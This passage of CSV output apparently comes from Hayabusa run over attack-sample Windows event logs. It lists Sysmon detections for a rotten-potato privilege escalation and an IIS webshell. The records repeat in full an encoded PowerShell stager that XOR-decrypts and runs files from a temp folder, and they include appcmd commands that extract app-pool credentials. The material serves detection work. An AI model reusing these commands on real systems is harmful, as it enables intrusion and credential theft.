365ABB72-B52C-5CEA-0000-00107A0D1100 | Tgt PID: 1240 | Tgt PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:00.752 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\notepad.exe | LID: 0x3e7 | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:01.864 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49172 (IEWIN7) | Dst: 10.0.2.18:888 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\notepad.exe | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 2584 | PGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,../hayabusa-rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Suspicious Execution of Powershell with Base64,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.000 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3484 | PGUID: 365ABB72-3D6C-5CEB-0000-00107257FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.110 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2644 | PGUID: 365ABB72-3D6D-5CEB-0000-0010575CFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.190 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2104 | PGUID: 365ABB72-3D6D-5CEB-0000-00101760FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.270 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8A